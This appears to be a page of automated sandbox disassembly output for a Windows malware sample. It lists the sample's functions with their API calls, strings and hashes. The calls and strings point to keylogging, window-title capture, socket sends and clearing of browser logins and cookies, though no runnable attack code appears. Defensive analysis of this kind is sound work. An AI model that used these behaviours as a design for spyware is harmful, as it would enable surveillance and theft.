                                                          APIs
                                                          • TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                          • UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                          • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                          • Instruction ID: 19faee7e247875c6ed4f8509c992ad96cda0262a64c11258bcf204109443e34b
                                                          • Opcode Fuzzy Hash: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                          • Instruction Fuzzy Hash: BEE01DB1245715DFD3101F545C94825BB99EB44746324087FF6C165252CD798C14C759
                                                          Function 00448F1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                          • Instruction ID: 0b1f6a9dfc50a2d3a5cef35921af3bd2f2baba9a31ad448e356136b6fbdd55d0
                                                          • Opcode Fuzzy Hash: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                          • Instruction Fuzzy Hash: 3AA14532A042869FFB258E18C8817AFBBA1EF15354F1841AFE8859B382C67C8D41D758
                                                          Function 00455BDA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                          • Instruction ID: 0bd1fcef5d7791e57e96aa6a4775832058b0444fd7bffa6098b49987863132bf
                                                          • Opcode Fuzzy Hash: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                          • Instruction Fuzzy Hash: 64415D31900F00ABEF227AB98C9667F3A75DF01775F14411FFC1896293D63C890986AA
                                                          Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                          • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: 974243172e929ecbed863af11f3888abaeff5056eaa34a0c48e853e7952ed2f5
                                                          • Instruction ID: 247d09dce9e3c977c7e86e48a76dae703d52755688f8fe644b587970fcea700c
                                                          • Opcode Fuzzy Hash: 974243172e929ecbed863af11f3888abaeff5056eaa34a0c48e853e7952ed2f5
                                                          • Instruction Fuzzy Hash: FE31A81124C38069CA117B7514167AB6F958A93754F08847FE8C4273E3DB7A480883EF
                                                          Function 0041AB95 Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                          • String ID:
                                                          • API String ID: 188215759-0
                                                          • Opcode ID: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                          • Instruction ID: 7cb4eddd506215a21d9c44be4850b318e12e80d273729b61be08d6c7a3dfdc1e
                                                          • Opcode Fuzzy Hash: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                          • Instruction Fuzzy Hash: 9A216D725043009FC304EF65D9858AFB7E8EFC8714F044A2EF58593251EA38EA49CBA7
                                                          Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B8F1: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B901
                                                            • Part of subcall function 0041B8F1: GetWindowTextLengthW.USER32(00000000), ref: 0041B90A
                                                            • Part of subcall function 0041B8F1: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B934
                                                          • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                          • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                          • Instruction ID: 7bed66d096a43dd94c2219bc8d3cdd3a5a7df98386a17a5ae9bf36b343ab91a8
                                                          • Opcode Fuzzy Hash: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                          • Instruction Fuzzy Hash: AF119F315042009BD218BB26DC17AAEBBA8AF41708F40047FF542621D3EF79AA1986DE
                                                          Function 00442EE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
                                                          • Instruction ID: b58c8eca075ef28bddc965f0bc4d2171c3ec1f8ef65ef5096018edf4bb449d44
                                                          • Opcode Fuzzy Hash: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
                                                          • Instruction Fuzzy Hash: 2501F2B26093163EF61016796CC1F27671CEF417B8BB1032BB626612D2EEA88C46606D
                                                          Function 00442F61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                          • Instruction ID: 7fe3e8edc5bbc175eb6928fc2517c3e9b6b95ea9c4057c88a91cd5d3c4beb3ed
                                                          • Opcode Fuzzy Hash: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                          • Instruction Fuzzy Hash: F201F9B22096167EB61016796DC4D27676DEF813B83F1033BF421612D1EEA8CC44A179
                                                          Function 00438305 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043831F
                                                            • Part of subcall function 0043826C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043829B
                                                            • Part of subcall function 0043826C: ___AdjustPointer.LIBCMT ref: 004382B6
                                                          • _UnwindNestedFrames.LIBCMT ref: 00438334
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438345
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0043836D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction ID: 0bcd00d322a0ad7a372b2cc4a74953bc209b0d499cbe7a3061e5fba3b10c2df3
                                                          • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction Fuzzy Hash: 3E014072100248BBDF126E96CC41DEF7B69EF4C758F04501DFE4866221D73AE861DBA4
                                                          Function 00447420 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue), ref: 00447452
                                                          • GetLastError.KERNEL32(?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000,00000364,?,004471A1), ref: 0044745E
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000), ref: 0044746C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                          • Instruction ID: 55721a836d87515a1eea2a56d4c7bce34062b93f94d6470a2cb527c4f3a692dc
                                                          • Opcode Fuzzy Hash: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                          • Instruction Fuzzy Hash: 6D01FC326497366BD7314F789C44A777FD8AF047617114535F906E3241DF28D802C6E8
                                                          Function 0041B825 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B852
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B877
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B885
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: ed58f78054f3304a0e571c39d56cdde4fa23284483a9ae65eff7322f5774d552
                                                          • Instruction ID: 2a104a3335fe37b36386f9496d9e2b25d881a91c22a4f34d2042fa75e5cfbfce
                                                          • Opcode Fuzzy Hash: ed58f78054f3304a0e571c39d56cdde4fa23284483a9ae65eff7322f5774d552
                                                          • Instruction Fuzzy Hash: 47F0C2B12422047FE6102F25AC89FBF3A5CDB86BA9F10023EF801A2291DE258C0581B9
                                                          Function 00418702 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 0041870F
                                                          • GetSystemMetrics.USER32(0000004D), ref: 00418715
                                                          • GetSystemMetrics.USER32(0000004E), ref: 0041871B
                                                          • GetSystemMetrics.USER32(0000004F), ref: 00418721
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                          • Instruction ID: 0d34e4fe417a410293abd419840fb627d3fd172a5f9f2d4f3f0ee0adad43daa0
                                                          • Opcode Fuzzy Hash: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                          • Instruction Fuzzy Hash: 26F0D672B043215BCB00AB754C4596EBB969FC03A4F25083FFA159B381EE78EC4687D9
                                                          Function 004420ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 0044217D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                          • Instruction ID: 9e1bbc3390eeabea57be79b34f62796538476165ffe421cdb5ba0d05f4dc7be1
                                                          • Opcode Fuzzy Hash: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                          • Instruction Fuzzy Hash: 7251AF61A0A20297F7557B15CE8137B2B90EB50741F684D6BF085423E9EB7CCC819F4E
                                                          Function 00421179 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID: <kG$<kG
                                                          • API String ID: 2931989736-383723866
                                                          • Opcode ID: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                          • Instruction ID: 841d78c923fca9e627808cf77cab3bf97fcfd39527adbe47470f5cf9fadca134
                                                          • Opcode Fuzzy Hash: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                          • Instruction Fuzzy Hash: 9F613471604B0A9ED710DF28D8806A6B7A5FF18304F440A3FEC5CCF656E3B8A955C7A9
                                                          Function 004095D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                            • Part of subcall function 0041B8B5: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041B8CA
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                          • String ID: pQG$NG
                                                          • API String ID: 2334542088-921107917
                                                          • Opcode ID: baae2f31211816717d1891d12ba902b559df7df93e5a23e8c27409df4f7124f2
                                                          • Instruction ID: 713adcd63a50277e86c853b9c7bd1a900ae8bd87492a3ad9f31fb308660c5d8e
                                                          • Opcode Fuzzy Hash: baae2f31211816717d1891d12ba902b559df7df93e5a23e8c27409df4f7124f2
                                                          • Instruction Fuzzy Hash: BB5141321082405AC365F775D8A2AEF73E5AFD4308F50483FF84A671E2EE789949C69D
                                                          Function 0044DD44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DD69
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $vD
                                                          • API String ID: 1807457897-3636070802
                                                          • Opcode ID: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                          • Instruction ID: 6a53932102cf2f29093c464eb4c67803ff3648b28b3ba8b7d074bec3f8911faa
                                                          • Opcode Fuzzy Hash: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                          • Instruction Fuzzy Hash: D0415DB0D047489BEF218E24CC84AF6BBF9DF55708F2404EEE58A87142D239AD45DF65
                                                          Function 00417DD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
